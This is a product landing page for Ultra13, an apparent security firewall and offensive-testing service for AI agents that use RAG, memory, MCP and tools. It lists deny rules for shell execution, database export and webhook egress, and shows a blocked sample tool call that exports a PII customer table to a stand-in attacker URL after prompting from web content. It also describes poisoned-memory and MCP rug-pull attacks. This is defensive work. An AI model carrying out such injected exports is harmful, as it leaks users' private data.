For CTOs · VP Engineering · AI leads

Ship AI agents with a security harness, not hope.

Ultra13 gives engineering teams offensive agent testing, context-aware runtime controls, and regression validation for agents that use RAG, memory, MCP, APIs, code execution, browsers, and internal tools.

Review the Architecture Run a Teardown on One Agent

where Ultra13 sits

External / user content

untrusted by default

Input classification + trust labelling

provenance attached to every span

Prompt / context assembly

what the model is allowed to see

RAG · memory · MCP · tool descriptions

evidence, not instruction

Ultra13 Context Firewall

source-to-sink policy + decisions

Model / agent loop

plan → tool → observe → act

Tool gateway / action gateway

inspected before execution

Audit log + validation harness

replayable, regression-tested

Control points

Enforcement where it actually matters.

The firewall is not a wrapper around the prompt. It sits at every boundary the agent crosses.

Prompt / context assembly

Decide what the model is allowed to see for this request.

Retrieved context

Treat RAG chunks as untrusted evidence with per-source policy.

Memory reads / writes

Gate what becomes persistent, and what it’s allowed to authorize.

MCP responses

Validate tool descriptions and responses; catch rug-pulls and shadowing.

Tool calls

Inspect name, args, identity, tenant, data class, and side effects.

Outbound actions

Control egress, exports, webhooks, shell, and code execution.

Source-to-sink policy

Which context can influence which action.

External web content can answer a question — but it cannot authorize a database export, a shell command, or an outbound webhook. You declare the boundary; the firewall enforces it.

policy/source-to-sink.rego

allow            sink=answer        from={user, rag, web, mcp}
deny             sink=db.export     from={web, rag, mcp, memory}
deny             sink=shell.exec    from=*            unless approved
deny             sink=webhook.post  from={web, rag}   # block egress
require_approval sink=*.write       when data_class=PII
treat            retrieved_context  as evidence not instruction

Tool-call inspection

Inspect the call before it runs.

Tool name, arguments, target resource, user identity, tenant, data classification, side effects, and the trust of the context that requested it — evaluated against policy, then a decision.

firewall.inspect(tool_call)

BLOCK

tool_namedatabase.export

arguments{

table"customers"

format"csv"

destination"https://paste.evil.sh/x"

}

user_identitysvc-agent@app

tenant_idacme-prod

data_classificationPII · restricted

side_effectsbulk_read · network_egress

origin_trustexternal (web content)

policy_decision BLOCK

// source-to-sink: external context cannot authorize a bulk PII export to an untrusted destination

memory safety

Poisoned memory never becomes standing instruction.

Untrusted memory is quarantined and trust-labelled, with TTLs on what can persist. A note an attacker planted last session can’t silently authorize an action this one.

trust-labelquarantinettlno implicit auth

continuous validation

Regression tests for agent security.

Re-run the offensive suite whenever the model, prompt, retrieval source, tool, or policy changes. Every change resets the risk posture — so every change gets re-tested.

model swapprompt changenew toolnew sourcepolicy diff

Integrations

Framework-neutral by design.

Ultra13 wraps the boundaries, not your framework. Bring whatever stack your agents already run on.

OpenAIAnthropicBedrockLangChainLlamaIndexCustom agentsMCPREST APIsVector DBsInternal tools

In the path

Inline, without inheriting new risk.

Drop it between your agent and the world without a new model dependency, a new token bill, or a new region problem.

Deterministic-first screening

Fast deterministic detectors run first, then a purpose-built specialist classifier checks what passes — not a generative LLM-judge in the hot path. Two tiers, fail-open: an outage falls back to detectors, never quarantines clean traffic.

Your model stays yours

The firewall fronts your agent and screens the boundary — bring your own model, keys, and provider bill. We screen the traffic; we never proxy-resell tokens or replace your model.

Choose your region

Run the managed service in the USA, EU, or UK for data residency — or self-host the data plane in your own VPC for full control.

Performance

Fast enough to leave in the request path.

The deterministic screening tier is CPU-cheap — measured on a single core, not estimated.

≈ 0.15 ms

deterministic screening CPU / request · p99 ≈ 0.19 ms

≈ 0.29 ms

end-to-end through the proxy · p99 ≈ 0.5 ms

< 0.1%

added latency vs. a typical LLM call — unmeasurable to a user

Inline SDK adds only screening CPU — no network hop. A quota rule adds one ~0.1–0.2 ms Redis round-trip; the opt-in classifier and OCR tiers add inference only when enabled.

Give us one workflow and one toolchain. We’ll show you where it breaks.

A technical teardown, context firewall controls, and a regression harness for the agent you’re shipping.

Start Technical Teardown Explore the Firewall